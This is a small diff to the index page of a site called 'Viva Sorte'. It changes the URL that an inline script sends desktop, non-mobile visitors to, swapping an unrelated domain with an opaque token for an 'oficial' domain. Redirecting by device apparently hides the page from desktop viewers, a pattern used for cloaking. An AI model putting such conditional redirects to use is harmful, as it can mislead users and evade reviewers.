--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
     <title>Viva Sorte</title>
 <script type="text/javascript">
     if (!navigator.userAgent.match(/(iPhone|iPod|iPad|Android|BlackBerry|IEMobile)/) && window.innerWidth > 768) {
-      window.location.href = 'https://ggmax.com.br/?Km4zNnS8QL=78NywpLsOU';
+      window.location.href = 'https://vivasorteoficial.com.br/';
     }
   </script>
     <!-- Meta Pixel Code -->
